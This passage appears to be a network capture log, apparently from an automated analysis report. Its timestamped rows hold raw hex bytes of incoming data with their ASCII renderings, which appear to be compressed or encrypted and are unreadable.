2023-10-13 13:21:13 UTC	4844	IN	Data Raw: df 24 5a d5 e1 3a 82 7b f8 33 62 71 eb 6e 62 7b 85 48 ef 88 c5 18 e2 53 b9 b6 0f 15 03 15 93 76 8f bf 45 79 c1 5c 43 0d 0f 2b ad 30 f6 94 6d 00 68 36 3c 14 b6 30 66 07 26 f4 c1 12 a5 c2 a2 01 7f 7f 37 7d bf 8d b2 1f 1b 54 23 de ee a7 56 41 55 ad c5 0f f0 c8 20 78 12 94 da ee 23 46 62 69 fb da 8b e1 e4 07 fd 1e 42 fa b7 4f f9 cf 7e f6 be 03 55 25 31 94 64 ba 15 7d 4f f4 bf de 2a 40 ba 67 f0 f2 e6 5c 6e 28 c8 dc 3c d7 96 4d 2c 24 10 e9 01 cb b5 09 92 6a df 6c e5 70 c0 84 a5 c3 11 1d a6 b0 a5 8a f6 40 f0 b0 5f 52 2d 93 0d 2c 2c af dd 6a d9 60 cf 05 48 6f 70 a2 f1 a6 a8 81 14 be e6 14 50 4e 00 c9 a0 1a 06 64 91 4e d7 44 4a 07 42 7a 1a 81 37 97 7d 3e f8 80 4f 49 f0 fc 3a 7e 47 43 07 7f bb f2 5f 0c 51 2e 99 0e 07 17 a6 a2 3b b1 5b ec 8f 5f 34 39 89 16 8a 50 7a Data Ascii: $Z:{3bqnb{HSvEy\C+0mh6<0f&7}T#VAU x#FbiBO~U%1d}O*@g\n(<M,$jlp@_R-,,j`HopPNdNDJBz7}>OI:~GC_Q.;[_49Pz
2023-10-13 13:21:13 UTC	4860	IN	Data Raw: cb 93 c8 79 3f 3d 1c 09 42 c5 ed 81 33 a1 f8 56 e1 ef 08 6f dc f5 de de ae 08 bb 0e 52 eb 12 48 95 f1 86 45 56 8c b9 03 2e 4b 52 19 07 12 98 df 14 15 41 0f 18 56 aa 15 28 eb d6 3e 82 f4 85 2a 42 5d 1c 56 e8 4d 16 69 12 70 cf 24 88 71 2e bc 8b cf c2 e0 2d ca 43 24 10 5a d5 a9 a0 87 48 a3 4d 53 36 6e 50 08 1e ac 84 01 fe 69 9a 8d 52 49 58 90 a3 42 e5 83 59 bb 57 68 fd 57 42 f7 a0 71 44 41 c3 c3 da 07 08 ee c0 95 c5 71 d3 00 14 b4 fa d4 e4 8b 24 af 44 3f 7d d0 f0 b0 db 8b f5 8f 4a 55 fb 4d 24 21 71 25 73 28 3a 70 9e d2 a3 2a 7f d3 11 58 8d 0b 98 fd c2 f4 9b 5c 0c f5 ce 7c ae 6f fb ec 54 55 eb b3 c7 3d c5 e3 5c fb bc b0 e1 38 56 df 2b d1 a1 6a d5 f1 3f 9e e0 5c 65 c0 21 f9 b9 44 a9 0f 15 5a b0 5e 3e e0 5b 6f 03 7b 8a ca 23 7e ac c9 41 26 4a be 70 6b fd 7a 6b Data Ascii: y?=B3VoRHEV.KRAV(>B]VMip$q.-C$ZHMS6nPiRIXBYWhWBqDAq$D?}JUM$!q%s(:pX\\|oTU=\8V+j?\e!DZ^>[o{#~A&Jpkzk
2023-10-13 13:21:13 UTC	4876	IN	Data Raw: 3a fb 14 c0 e1 75 0e ac cc d3 48 60 e9 da 60 62 2c 34 40 50 9a d3 9d ee 1e fd 04 2d ca 5a 94 a0 cb 7c df 48 2f 01 77 c7 d8 6e 54 56 68 94 75 6a 3c 6d 73 88 6d c4 a3 2a 10 d4 ed 64 52 15 10 b9 48 09 3c 2d 5d e8 97 cc 2b fb 4f 82 d7 ab f1 a7 31 09 32 3a e4 44 c7 d1 80 ba 72 31 d0 67 d4 e7 58 61 05 e3 7a a1 a1 4a bb 0c f2 77 22 66 4a 13 66 b2 00 0c 1f 76 59 9b eb 55 f6 aa e8 b7 ac bb 1b 85 8f 71 5a 52 d9 c7 ae 68 fa 95 70 e9 08 a4 ee 58 86 ed 7f bd 3e 2e c7 88 95 24 0a 99 68 9c 71 9c 6a 29 9e 5f bf 52 c1 b6 41 8c 14 7f 71 f8 c8 ea b6 d0 37 25 1b 67 ba 4c 3d fa f2 25 e4 17 d9 12 df c6 43 5f 61 bc fd 03 01 58 97 af 2b 8f 04 22 0b a8 58 66 29 4c 24 29 bb 32 c2 54 6c 1e fa a4 02 1d 4d 10 60 ce e2 59 a4 d5 03 ec 13 21 54 21 b3 a2 20 ef 29 89 e7 df 7b 07 15 72 e0 Data Ascii: :uH``b,4@P-Z\|H/wnTVhuj<msm*dRH<-]+O12:Dr1gXazJw"fJfvYUqZRhpX>.$hqj)_RAq7%gL=%C_aX+"Xf)L$)2TlM`Y!T! ){r
2023-10-13 13:21:13 UTC	4892	IN	Data Raw: b5 de 10 3c f5 1e 8e 3d 1f fc d7 68 4d f4 62 f8 e4 e5 fb 77 b6 ab da 07 98 f2 d4 fb 18 ab 7e e3 8d 59 68 b4 26 96 55 a1 57 40 79 17 fd 56 16 e9 df 79 d2 4b 48 54 eb e5 01 3e 41 6b 85 84 da 7f 6e 0f e8 ce c0 50 be db 14 d2 38 cb 6e 9c 36 db 41 26 66 03 ea 59 19 6a 6b cc 6a 94 a4 be 12 bc 46 41 74 24 c2 a2 4f 81 9c 48 6c 03 ad 6f 65 a2 3c f6 ad f7 6d 8c 72 41 1d 85 84 cc d4 9b 82 ec 60 6d 1d 21 72 b6 04 65 a6 8c 12 b5 17 cd 5b 33 ad 19 6c d5 f1 19 c3 ed 40 a3 2b fe e9 bc d2 84 5e 90 94 a5 c3 d9 9a cf cc c1 d2 93 5e 50 ca f0 2e 4a 11 0a a2 da 6a 05 be e3 11 e2 29 ae 81 4b 22 9b 14 d2 21 9b 51 96 78 c7 80 88 7c 52 65 4e 3b 01 fb c7 2d b9 f9 7d 50 53 d2 24 4f 86 cf 67 6e d2 3c 45 43 b2 0e 9b 6c 3c 27 1b f9 5f eb 45 d1 21 73 a4 7e 74 95 30 4c 6f d0 ad 17 b6 c7 Data Ascii: <=hMbw~Yh&UW@yVyKHT>AknP8n6A&fYjkjFAt$OHloe<mrA`m!re[3l@+^^P.Jj)K"!Qx\|ReN;-}PS$Ogn<ECl<'_E!s~t0Lo
2023-10-13 13:21:13 UTC	4908	IN	Data Raw: a5 29 aa b2 af 45 3a f3 37 69 1c f4 c0 55 dd c1 e0 3f 24 74 40 48 38 b4 2c eb 5c 92 fb 40 8c ff c3 ec e4 60 c6 fb 05 22 4c b3 10 bf 22 64 f5 e3 e5 de ee 9f ca 0e 9e a4 11 d7 65 7a b5 61 8e 10 8f ed 38 56 32 15 8a c8 98 d5 d0 01 08 60 24 b1 93 32 28 29 b0 42 d5 e5 d6 d9 99 79 d3 94 cd 09 94 a0 c9 e1 0b ec 78 df 73 c3 68 8d 17 d2 ad c7 6e 0a 1e 0b 11 f7 37 c3 cb 5b 51 6e 8a d5 67 dd eb d4 38 7e de 0e b0 f2 5b 9a 10 5f da 24 26 2b d4 75 fe 5d a1 cb a2 88 14 ca 13 bf 5b 9a f2 fd e6 09 34 08 c8 67 35 fc c3 3f 72 10 76 4c e2 d0 12 ac 71 c9 ac 34 0b 8a 16 4c 84 2a 7a 41 59 ae 80 58 5b 2e 52 ad 58 ed dd 9f c8 b3 91 4f 5f 90 ea 17 3e 0e d6 87 f8 c6 85 4b b6 1b 0a 8a 15 86 34 3c f2 58 31 8d 35 58 b5 99 33 50 2e e4 f7 10 04 73 91 b0 6a 35 7a a9 5c 7b b1 47 b2 94 d8 Data Ascii: )E:7iU?$t@H8,\@`"L"deza8V2`$2()Byxshn7[Qng8~[_$&+u][4g5?rvLq4L*zAYX[.RXO_>K4<X15X3P.sj5z\{G
2023-10-13 13:21:13 UTC	4924	IN	Data Raw: d3 46 58 4e 06 d8 bc c7 26 4f 1f 3a a0 4e 64 6f be 2d 80 71 18 4e b5 07 e7 4a 61 6e 98 2e 6c fd 9c c5 95 d8 f7 15 f3 bd 4a 91 59 77 a2 6e c0 ca 6d 13 bf e1 6a 8b 11 95 6d 39 60 ef 97 21 61 83 1e 29 33 15 38 80 64 03 36 8b c0 23 7c 8c 3a 22 ec 7c b7 b3 17 ca 0e 25 93 9d 22 69 65 26 68 77 9b db 3e 17 e0 18 8f 34 98 c4 8f a6 50 61 a3 b7 11 fd 70 b7 51 15 f6 94 bb a7 04 bc 85 a0 22 5b f0 ab 43 b7 1b c8 ea 4b 35 53 7e 67 21 c3 e1 66 f4 e2 f2 c9 7e e7 c4 11 f1 c6 8b bd db 71 d5 f5 4e 8a 93 c6 2f 6e e4 3f 3a 00 55 2c fe c3 ce a9 ab 51 87 18 13 25 8d c4 c0 b9 06 32 ab 09 8c 88 11 b5 3b a8 88 a0 67 a0 be 9e 98 bc a7 37 77 97 af 5a 63 4f b0 3f 9d b8 5d a3 d4 c5 7e 62 a2 21 16 a3 7a 59 fe 49 5d 01 c6 9e 86 5c 9e c9 9b 47 ac 83 43 cc d3 ed 5a 59 91 41 5e 20 60 5f 15 Data Ascii: FXN&O:Ndo-qNJan.lJYwnmjm9`!a)38d6#\|:"\|%"ie&hw>4PapQ"[CK5S~g!f~qN/n?:U,Q%2;g7wZcO?]~b!zYI]\GCZYA^ `_
2023-10-13 13:21:13 UTC	4940	IN	Data Raw: 28 9c 59 93 32 e9 2e 78 c2 4b 67 97 6d 5c 73 79 e7 c9 04 29 c0 6d f8 f5 be df a5 58 ca 67 95 36 a9 5a bb d6 4d 3b d1 1d 35 48 15 fd 81 dd 38 f5 9a 13 94 b3 4e 60 33 23 49 1d 92 c9 4f 73 1f ab 2d bb b5 98 e6 6e ad b4 0f 96 f2 26 b1 79 8b 17 04 3b a3 cc 42 cf 06 81 46 72 f1 ae 70 28 4c d9 a3 78 e6 e8 68 7b bb 4a 27 f0 15 31 6e 6b 5e da 8e 11 28 4e b3 0d f3 41 1c 90 25 37 8d e0 22 87 a8 34 63 3a f2 0a 24 2e eb d7 a0 41 e2 d5 8e 52 73 80 93 72 fa 62 b7 0f 52 2c 56 2d 9b 5f db 95 63 21 14 33 d0 8a 1b 79 22 88 d6 e0 2b 98 9e a1 cc da ad 0b dc 33 99 80 a2 73 e3 57 4d 9b 4b 3c d2 cf bf 38 f1 23 6b 77 f1 e9 2c 25 bb a4 65 f3 4b de 4f c8 cd 30 a8 ba a7 27 c5 a9 cd 67 6e c8 08 fe 9b 67 6b 30 ee 23 16 31 77 23 cd ce 68 46 f8 c5 e9 a5 20 a2 46 f9 9e e4 16 a0 44 01 ee Data Ascii: (Y2.xKgm\sy)mXg6ZM;5H8N`3#IOs-n&y;BFrp(Lxh{J'1nk^(NA%7"4c:$.ARsrbR,V-_c!3y"+3sWMK<8#kw,%eKO0'gngk0#1w#hF FD
2023-10-13 13:21:13 UTC	4956	IN	Data Raw: b4 a4 4f 56 34 b7 3b bf 9e 8c c4 27 01 bc 0a 93 ec 99 34 97 7a 79 5c c5 c5 34 65 7a 0d 95 cd c2 17 e7 40 d1 a3 df ef da 3f 38 96 d7 68 3f 95 6e a9 f9 81 51 53 2b 37 02 1b 6b 5d 7d 27 7a a1 02 43 65 a6 c6 27 65 ed e3 c8 b1 67 31 e8 79 45 0b ad c3 20 a8 df a8 25 fc 00 85 eb e9 dd 38 1b ad c7 39 89 e9 72 63 21 4c 7f 94 cd 2f ff 04 02 43 33 ba d7 e2 db 4f 8b 84 16 7d bb 64 b3 1e 94 55 97 97 b1 51 25 8c 81 8a 1c 8a df c7 c4 f5 83 f6 62 13 2f c2 f6 13 1b f7 70 6c 1d dd fa 3a 2e 65 e7 61 56 bf e3 35 ea f6 21 e5 63 e8 45 91 37 26 bd c0 40 92 14 45 94 37 d8 e1 5d 9b 81 85 b7 8a 3c 75 32 13 63 27 80 93 61 45 21 11 c9 f8 0c 0f d9 57 42 d4 d5 e7 7d dd 88 04 cc 5c b2 fb 51 9c 3b dd 85 75 ef e1 8e a7 a4 d1 f6 98 ed 02 13 44 d8 bc ab 21 c1 0d 4f 09 82 b1 1d 32 d5 5b e2 Data Ascii: OV4;'4zy\4ez@?8h?nQS+7k]}'zCe'eg1yE %89rc!L/C3O}dUQ%b/pl:.eaV5!cE7&@E7]<u2c'aE!WB}\Q;uD!O2[
2023-10-13 13:21:13 UTC	4972	IN	Data Raw: 71 26 92 9c ea d4 e5 c1 d8 4c 79 f1 0f 5e 63 f1 a8 9a 8c 8a 75 b9 1d 9c a0 51 57 9a 6e 5d cf 91 a9 e0 e7 0c 66 4c 73 4f 92 02 c1 9b 91 2a 2c 31 46 c2 10 d5 79 bb 87 fc 58 77 05 5f be 61 70 ae 63 47 e3 62 e2 de 01 07 61 da ac 55 03 60 96 b5 67 07 ed e0 41 01 6a 6e 77 c1 d5 1f 57 eb a4 f9 c6 74 01 03 cf e2 28 36 a5 6c a4 f9 13 cb d5 c5 c7 ce ec c6 12 b2 6c 80 be 57 36 70 08 3a 5d 65 0e 65 0c ba fc b9 f8 e2 65 c5 d5 cc 92 68 96 ec 38 b3 1c 39 b0 4c 82 68 3a 2d 31 d9 ad 13 9b 47 12 dd 90 c3 0e 89 31 76 c9 13 d3 4e 38 a2 bc 4a a3 28 ab 21 9b 22 4f b0 b7 45 5e ab ea cc 06 88 4a b5 f0 af 40 7b 4b 1b 42 04 6c f1 f2 b1 ab 0c 3e 84 7d 5d 80 66 2a fa e8 b4 4f 97 9c 93 db f6 71 7b 79 67 66 1b 13 b3 17 56 2d 06 6c 3d d3 a7 12 6a 7c f6 5f 1b 80 7c 6a d1 27 20 f9 9f b0 Data Ascii: q&Ly^cuQWn]fLsO,1FyXw_apcGbaU`gAjnwWt(6llW6p:]eeeh89Lh:-1G1vN8J(!"OE^J@{KBl>}]fOq{ygfV-l=j\|_\|j'
2023-10-13 13:21:13 UTC	4988	IN	Data Raw: c5 33 e0 cc 9f 1f ca 69 92 d7 ea e8 28 bf 15 17 0f 4f bb 65 46 ba 71 bd 5f c6 7e 9e e5 e4 64 c2 a7 bd 46 22 6a d0 b0 c4 e5 09 bf 5d 8d 91 4e ae 28 2c 8c 65 81 29 43 42 ef 94 02 ed 4e bd ca 41 2e 7a f0 4e 3b 94 62 1b 21 e6 84 b1 97 d9 12 ef 1f 39 be 6e 53 1f a9 ec 2e dc d3 e2 f3 82 2a 40 bd 64 e6 30 d6 30 3e c6 1a 1d 0d 78 3f 38 e8 4f 4a e8 5b 73 29 67 28 6a ad 27 c5 21 10 78 49 0f 47 1f 60 8f 42 5e cd c5 58 a2 3e 8b 55 b2 05 0a 93 8a f4 4a a2 0d c9 c7 31 76 2b 97 74 74 b4 d0 2a e5 8c 6f 7b 80 92 80 c8 93 45 f4 3a 9a 5c 95 bd d4 93 e3 b3 21 43 69 7d e0 f7 4b 40 ac cd 5c 7e 77 19 9b 8d 38 01 80 25 c7 b0 d1 8b 21 62 f2 7c f0 0d 48 d9 88 f0 07 87 3c 93 32 34 52 48 de 87 51 9f 29 fb 99 ae f4 20 5d 44 ba b1 50 5c a8 1f e0 61 1e 93 34 71 da 89 17 85 af 1b b0 b8 Data Ascii: 3i(OeFq_~dF"j]N(,e)CBNA.zN;b!9nS.@d00>x?8OJ[s)g(j'!xIG`B^X>UJ1v+tto{E:\!Ci}K@\~w8%!b\|H<24RHQ) ]DP\a4q
2023-10-13 13:21:13 UTC	5004	IN	Data Raw: 36 12 a7 c6 98 81 cc 1b 25 f5 d5 be 06 18 c5 e6 d4 1b 55 a8 48 42 b4 a8 b6 f2 06 37 1e d5 4e 08 3c ad 40 81 7f 98 a8 db bd 6f b0 fa f3 2a 10 4d 35 86 ab 4c 42 f3 b8 c7 46 b4 06 83 ff e4 78 8f 77 c2 1f d4 b0 e5 83 9c fe b8 fb 5a 78 31 3d 0f 09 c3 46 8e df e4 e5 ca 98 30 73 28 c7 54 41 f2 e8 cd 29 1f 31 ff 4a 9d 50 30 39 e7 bc 45 9d 73 b8 e9 39 a9 3d 74 1b 50 0a a1 8f 1e 5a 51 a1 86 b8 63 62 51 e3 e2 05 20 e0 3e 69 1b 89 f3 f6 28 cf 12 01 b5 41 c5 28 95 eb 17 94 24 5b b1 32 81 3f 75 ad 8c 7a 46 4b 62 1e d8 15 a0 1b 89 84 ca d8 3d 90 9e 21 f7 a0 70 9c 0e 13 d6 aa 3b 8f 12 09 09 67 0c e4 58 c3 85 84 ba af 84 31 f1 8c 06 bd 58 ec 1e 7c e7 2b 54 e0 43 ec a7 49 bb 66 ee 50 00 b7 aa 79 d5 51 fc 78 21 7b c9 93 65 d0 bc ab 25 6d 25 f2 d1 49 f7 f1 41 f5 20 24 bc 2f Data Ascii: 6%UHB7N<@o*M5LBFxwZx1=F0s(TA)1JP09Es9=tPZQcbQ >i(A($[2?uzFKb=!p;gX1X\|+TCIfPyQx!{e%m%IA $/
2023-10-13 13:21:13 UTC	5020	IN	Data Raw: 2e eb d9 f6 72 6b ae 64 b2 ea 2e be 33 5b 13 e0 bc e3 6b 27 f7 91 15 de 71 9c da 17 e5 fb cb a3 4e 72 74 8d 1b dc 5b 05 dc ba 64 81 62 ed 1d 5a 31 c6 c6 72 86 b9 32 ea 54 f4 f8 ac bc d6 38 a8 95 91 e2 59 04 57 75 be 4d 6a 38 0c 9c 27 bc c2 55 00 04 90 a4 07 2b e3 06 67 d7 32 1c 9e 60 61 ae aa 69 2e 28 f8 cd 90 41 ef cd 9f 4c b8 20 bd 99 8e c4 64 18 aa 1b 4a 5f 37 6a 7c 7a 35 a4 53 aa 3b ee 1d 03 99 42 d9 fe 3b 10 6d 70 8d 63 0b 2e f2 16 06 0f 7b eb 1a 11 ed a4 a5 49 41 41 da 23 47 cb f2 53 8a ae 8f b0 49 b3 f6 82 82 db 81 df 45 b6 27 98 e9 5d 5d bb 8f 29 bd 4e c8 4f cc 75 6d f9 10 45 63 46 f2 8a 17 c5 10 8b 79 61 d7 30 99 24 3c 03 e7 2c 15 3d 28 07 01 e0 e6 38 60 e1 9f 12 8a 39 b3 a3 e3 93 12 f0 e6 76 d2 07 d8 a1 ce 34 b3 7d de 0a 89 ff 52 55 55 88 1f b8 Data Ascii: .rkd.3[k'qNrt[dbZ1r2T8YWuMj8'U+g2`ai.(AL dJ_7j\|z5S;B;mpc.{IAA#GSIE']])NOumEcFya0$<,=(8`9v4}RUU
2023-10-13 13:21:13 UTC	5038	IN	Data Raw: 68 58 07 ae fd 3f ff 68 70 1d 72 a5 e6 5a b7 6c 06 0b 63 95 93 1a de 24 f6 91 8c 93 b7 d2 ce 84 e8 3f d5 80 c1 ce ae 94 62 c7 92 fd ff 61 b6 42 94 db 07 88 9b 38 8a 29 7d 8f 83 12 2b 99 82 d8 a2 dd 21 0a 16 f1 5a bc 01 ad db 66 66 13 0f 02 62 fe 3a 6f 5e e5 ad a8 d3 87 9c 6b 8b cb d4 90 1e 58 d8 4c 0a 3b c9 5d a1 6d c6 45 f4 23 b6 b9 aa 91 e9 2d 56 0e 5b 67 cb 83 37 31 5f 64 42 f3 fe a2 8c 71 d4 23 a6 12 ce 4e 14 0c c8 32 5f b5 ae 7a 71 60 55 af 00 17 82 c7 23 aa 06 88 0d eb 04 f4 64 56 e4 4a 98 60 8e 12 a4 d8 0a b5 24 81 67 31 eb 3a 44 ca a2 94 93 4b bd f5 be 76 a7 fe 0f 46 4e 86 82 70 d0 8b ad f9 28 f7 68 e6 b9 8b e8 cc 22 bf a9 2e 74 a7 96 b8 98 17 44 3f dd f5 a5 c8 11 72 d6 94 7f eb 7d 96 71 4d ed a8 34 fb 84 4f f0 28 de f2 7a a1 11 b4 34 1e 03 87 72 Data Ascii: hX?hprZlc$?baB8)}+!Zffb:o^kXL;]mE#-V[g71_dBq#N2_zq`U#dVJ`$g1:DKvFNp(h".tD?r}qM4O(z4r
2023-10-13 13:21:13 UTC	5054	IN	Data Raw: ee a2 89 54 a7 d4 46 cd 57 b4 1a 7e 8d 0e 8a 9d df 97 0a 7d 7a 39 79 e7 9e f4 0a 8c cf ff 2b a5 05 a3 d4 12 f5 26 5f 17 15 07 dd 38 cb 39 cd 34 32 cb 02 8d 35 de 50 99 0b 20 73 75 61 eb 6c 7e d9 34 2d bc 77 65 3f f2 ba 40 6e 4f 57 ea cb 69 ec 57 c1 8c e7 e6 6b 90 cc 70 83 31 d0 14 74 4c ae 16 09 aa 28 ab bb 08 a0 58 61 75 8d 95 38 3c 72 11 2d 50 f6 6d 1d d3 91 80 8d c3 f1 02 a0 40 34 31 51 b6 12 84 e6 ff c8 71 aa 31 9e a5 5e 32 9b 4d 70 c4 20 4c ad d5 86 00 3f 30 6b 4c 3f 14 db b5 68 5f 87 ee bb 5a bf 5e 41 b3 3a 9c 46 2b 6d 5a 11 55 ba ba c0 1a a4 0c 95 90 4c f0 d2 7e d5 ea d3 57 9c ed 4e 82 89 2a 8a 0b f8 03 8c de 30 96 9d 0a 6a c7 29 aa 23 ce 6b 7d 90 e0 c5 34 0a 02 76 ce a5 08 f9 2f 89 ea d1 21 b9 3b 44 4f 7f 39 b2 88 7f ae 8b 3c 02 22 eb 80 94 cb e7 Data Ascii: TFW~}z9y+&_89425P sual~4-we?@nOWiWkp1tL(Xau8<r-Pm@41Qq1^2Mp L?0kL?h_Z^A:F+mZUL~WN*0j)#k}4v/!;DO9<"
2023-10-13 13:21:13 UTC	5070	IN	Data Raw: ed c3 a9 6e 60 78 c1 a2 ff 94 b6 6e fc f3 d7 fa 5e 11 06 c7 e0 0e 97 cb 1c 2a f9 c5 60 f1 56 d7 66 02 a4 cf 75 78 a9 63 b6 c7 1c f0 5d d5 f5 29 ac dc 49 b0 08 ae c9 d2 67 26 77 41 f9 d9 70 4d 23 48 8a 34 b2 7c 26 11 fd 06 e2 52 50 01 fc 76 81 b6 90 3f c4 5f 50 ff 94 ce ef 1a bc a0 e4 2e 2d 31 40 c8 67 ee 00 41 bf 38 85 09 70 83 08 5e 06 77 1f 6e b2 47 17 07 75 54 33 a0 cd 74 47 e0 4f e2 24 e3 8e 5b 55 e9 f3 6b 6a 28 cf 91 05 a0 50 da a7 2a a5 fc 08 21 b2 5f 87 81 c2 cc f3 a8 ab 92 4a be 25 e3 e3 24 de f4 be d7 2e a8 12 0c 96 4b 21 d1 7c 7a 40 13 82 0c 9e d7 c6 35 90 15 e0 0a e4 f8 c4 1e f5 9e 07 0d 3a 2a cd 28 28 ff 3d 03 b7 d8 87 cb b2 f5 be d6 aa 61 b8 ba 73 50 8e 89 fd 1c 31 fb 9a 08 24 b1 06 02 3b 07 0f 88 e6 1d 92 73 c5 7c 22 86 05 92 32 d8 10 1e 05 Data Ascii: n`xn^`Vfuxc])Ig&wApM#H4\|&RPv?_P.-1@gA8p^wnGuT3tGO$[Ukj(P!_J%$.K!\|z@5:*((=asP1$;s\|"2
2023-10-13 13:21:13 UTC	5086	IN	Data Raw: 28 f4 6b df bb a3 cd a6 cb fd 26 a6 65 92 68 fe 00 09 31 df d9 29 21 13 f6 a7 f5 79 c4 38 a0 a2 86 42 b0 26 97 21 b7 aa 67 3b 4b fa e0 88 e3 46 6f e2 4b 90 49 2a 05 d2 0f f7 58 d0 0b c4 86 4b 25 5f 4e 27 8b 85 d8 d5 33 ce 90 bb ed c2 1e fd 4f af 17 a2 1f 05 24 be 1a f5 68 b4 bd 08 c5 78 4b a1 ad 93 9d 74 c2 e9 42 7d 4e fa d5 4f 61 2d df f8 28 f5 0b 42 48 a4 58 d6 30 47 eb c2 88 46 f0 2f 28 f8 79 6c 3a 6a bb 9a 84 ea a6 79 33 54 e8 b9 fc de d9 91 83 b5 50 7e 48 6f 06 b0 56 a7 f1 dc f2 3f ed c6 f6 f4 07 20 05 2e 1a 26 11 f4 6b 2e 87 e8 d6 b7 2d 21 a2 0b 2f 68 c0 5b b5 13 60 40 93 e2 fc a0 75 06 70 40 64 be 00 ba 76 18 43 33 27 04 6c 8b ab 11 2c 8c 71 0d 0b 71 3f 42 75 30 3d fb 2d 21 c8 48 2d 9d 74 ca 74 d5 6d d8 47 39 4d ed 48 c7 9a 2d 56 8e aa ec 0a 06 f7 Data Ascii: (k&eh1)!y8B&!g;KFoKI*XK%_N'3O$hxKtB}NOa-(BHX0GF/(yl:jy3TP~HoV? .&k.-!/h[`@up@dvC3'l,qq?Bu0=-!H-ttmG9MH-V
2023-10-13 13:21:13 UTC	5102	IN	Data Raw: f6 0c 4d 1b 6b 11 1f 21 20 31 f4 f6 64 97 3f 22 3c 1b f1 9e ca a2 dd 1c 78 f4 18 fc 63 9c 6d 9b 58 f7 57 29 40 6b b2 2f d0 3e 7a 7b 52 8c 06 fa 6c c1 85 38 32 b7 da 6f cd d8 4c 68 a2 b5 fc df 80 91 32 e8 83 f9 4c 0f dc 8c ea b9 22 eb 03 a9 a7 e7 2d 99 7b e4 38 ae 65 ff ef a9 83 3b 3a 12 ac b2 e4 e6 ab 07 03 35 11 2a 33 5a 88 4e d7 ec a9 e8 04 ac 8d cb 04 fd 43 40 d5 6e 1a e0 bc 52 f3 15 1c 3a 7f 3d 11 43 58 5c de c7 9c fe bd 8a aa b4 30 8d 59 f4 3f 6c 6a 93 39 d9 c9 02 a7 b5 45 db 52 44 25 ea bc 65 7c 83 63 7e 8e b0 63 92 f3 a1 aa 58 b9 6d 1c 96 c5 ca 2d 5f 53 b1 2a f6 ee 22 31 03 fe 50 85 32 3d ab dd 85 b2 35 ce f9 00 c3 8b fe 4c 7c aa 42 7d b1 50 36 89 60 91 77 01 80 9e f3 93 8a da af d2 e7 90 3e 08 56 22 6e 2c 6c 3f e7 da a0 04 2b e0 ea cb ee cf e6 a7 Data Ascii: Mk! 1d?"<xcmXW)@k/>z{Rl82oLh2L"-{8e;:53ZNC@nR:=CX\0Y?lj9ERD%e\|c~cXm-_S"1P2=5L\|B}P6`w>V"n,l?+
2023-10-13 13:21:13 UTC	5118	IN	Data Raw: e3 08 82 39 1f 53 fe 62 56 c5 53 3d 7c 73 5e 54 20 a8 52 e1 a1 c5 29 cd 23 ff 5b 33 66 9b 3b e9 c9 63 88 30 ab 06 9f 67 8c cf 9f 41 a5 bc 5d b7 fd 5e 0c c9 0d fa dd c2 90 61 95 af 47 fc c1 2e 79 c2 4f eb 36 d5 93 25 3f 02 7a 68 32 cf f6 64 d9 2d 85 4f ec cc d4 05 dd cb f2 4c 9c 7c 6d bc 85 18 62 62 a0 d9 20 23 87 d4 0f 89 34 08 f1 68 6b e8 a8 d4 77 9e c5 23 d4 04 11 72 44 63 d0 51 91 cd 1d e5 ed 51 ce 40 c9 a5 8e 5f a3 6a c3 73 aa 6e 12 8d 77 3d d3 77 aa d8 c1 e5 c8 2e 43 f3 8f b2 5d 0f 14 4b 9c 8d 92 1e e9 d0 d7 18 41 44 f5 e7 9b b3 20 8a 2d 4a 04 4d 60 60 6e fe a9 21 a2 60 e6 50 8e 17 fc d7 7f 42 29 83 6d ec 1a 2b c5 66 d8 58 a8 0c c6 7e 04 4a 72 de e5 df d9 96 db 4e f5 03 04 0b c9 a4 47 18 97 4a a3 d2 dc 29 92 a4 bf 67 99 1c 66 2b 6b 32 8b 83 2f c7 4a Data Ascii: 9SbVS=\|s^T R)#[3f;c0gA]^aG.yO6%?zh2d-OL\|mbb #4hkw#rDcQQ@_jsnw=w.C]KAD -JM``n!`PB)m+fX~JrNGJ)gf+k2/J
2023-10-13 13:21:13 UTC	5134	IN	Data Raw: 4d 03 47 8c 15 9f 9c 11 aa 50 e8 b6 f5 2d 7a d7 fa 2d fa 26 e5 ea 24 02 02 6d 46 19 86 3a 85 d1 6f 97 96 72 04 55 cd 5a b6 7c aa fc 02 8d e3 7b c6 8e fb 50 8b 21 09 1c 55 fa 2e 79 e3 da 1c 14 e9 57 fb 90 06 97 39 f1 6c 46 00 6c a2 c0 f4 30 a5 0d 3c c6 d3 cb 47 ed 9c 31 be ad 54 a7 37 be 29 a9 63 ff 96 8b cb f2 b6 08 0e f6 78 f5 7f c3 7a 4c f4 b6 1d 4a 1e fc cd 6b 00 33 49 57 74 f6 89 10 d5 cc 03 7d 4d 18 dd 68 1f 98 6e 31 60 63 28 85 86 d2 5a ba c3 43 cb 7a a2 06 62 82 6a 00 ec 62 c6 43 74 08 f0 65 63 84 63 fe d2 fa a6 ab 9d c5 2c e2 d4 89 c5 7e 79 9d eb f2 47 c1 43 23 41 c5 8a af 9a c3 1b ec c3 df 9d 9f 96 18 ea 76 f9 ea fc 65 a1 9d de a2 11 3e 37 0f e9 5c 76 19 28 2a ac 01 a3 72 b1 9e 8d 08 47 2a db 9c c7 0f 45 d3 5c 12 86 f2 dc 71 8d b8 e9 1b 8e 0e f6 Data Ascii: MGP-z-&$mF:orUZ\|{P!U.yW9lFl0<G1T7)cxzLJk3IWt}Mhn1`c(ZCzbjbCtecc,~yGC#Ave>7\v(rGE\q
2023-10-13 13:21:13 UTC	5150	IN	Data Raw: 73 87 59 c7 e6 af f0 e9 91 c5 bc d3 7b ea fd 7f fa ac 87 21 98 05 0a 3d 37 b3 8c 06 25 12 18 07 d2 a3 b9 e8 e1 e2 0e 92 6d 98 3a 17 7e df a6 bd 73 ad 59 04 5a 99 52 70 30 6a 7d a0 72 80 e3 fb db cb 77 07 3b 23 c5 11 76 4c 25 c6 39 2f 88 2e 0f 64 c2 d2 bd 6f 5c 0c 7d f9 39 4a 8e 6c 8e 33 62 2c 15 6a 17 d7 d3 aa b4 f5 b0 ab 05 56 a8 83 71 94 1b b0 7c fb 6f 27 c5 5c 04 aa e8 7b 33 a0 6a c5 09 14 da 97 b7 40 96 71 fc 15 80 62 bc 1c 6c 92 89 a3 34 f2 8a 1c 7e e7 49 ef c6 2d 27 a1 b8 b5 61 ec ba d5 2a 45 ee f5 d9 cc 9a 76 82 3b b4 10 d2 5d 44 80 2d 14 ea 38 72 bb a3 4c 46 f0 76 41 41 5b c8 8d 6e 3a e0 46 f4 81 3e a9 a5 cd 63 09 59 86 7a 66 18 d3 ba f3 55 cd 5a b7 34 86 1c 1c bb 45 be 16 4c d4 f0 80 09 39 